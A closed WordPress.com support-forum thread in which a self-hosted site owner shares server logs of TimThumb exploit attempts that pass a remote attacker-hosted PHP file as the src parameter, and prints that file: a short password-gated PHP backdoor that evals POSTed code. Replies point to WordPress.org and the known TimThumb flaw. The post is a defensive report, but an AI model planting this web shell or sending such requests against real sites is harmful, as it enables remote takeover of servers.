New Hack Attempt on Self Hosted WordPress Site!!
-
Got this in my “hack prevention” scripts that I have running on the site
Remote Address:[removed]
Remote Port:47762
Request Method:GET
Referer:
Query String:
Request URI:/home/wp-content/themes/mystique/thumb.php?src=http://blogger.com.bloggera.net/images.php
User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62And also
Remote Address:[removed]
Remote Port:47764
Request Method:GET
Referer:
Query String:
Request URI:/home/wp-content/themes/mystique/timthumb.php?src=http://blogger.com.bloggera.net/images.php
User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62The content of the File “images.php” is
::::BINARY CODE PAYLOAD::::
<?php
if(md5($_POST[“key”]) == “f732d47960be7e806861987f98a9574c”){
$cmd = $_POST[“code”];
eval (stripslashes($cmd));
}
?>Looks like they are trying to gain CMD on my Apache server
If you guys are getting the same, I suggest you block PHP files in your wp-content folder
The blog I need help with is: (visible only to logged in users)
-
The blog you specified at pinchii.com does not appear to be hosted at WordPress.com.
This support forum is for blogs hosted at WordPress.com. If your question is about a self-hosted WordPress blog then you’ll find help at the WordPress.org forums.
If you don’t understand the difference between WordPress.com and WordPress.org, you may find this information helpful.
If you forgot to include a link to your blog, you can reply and include it below. It’ll help people to answer your question.
This is an automated message.
-
You are posting to the wrong support forum. We cannot help you here at WordPress.COM as we run on different software. please post to the correct forum forum your software. It’s where the support bot points to http://wordpress.ORG/support/
-
This is a well-known vulnerability in the Timthumb script, not WordPress.
See this for more details: http://ma.tt/2011/08/the-timthumb-saga/
- The topic ‘New Hack Attempt on Self Hosted WordPress Site!!’ is closed to new replies.
WordPress.com Forums 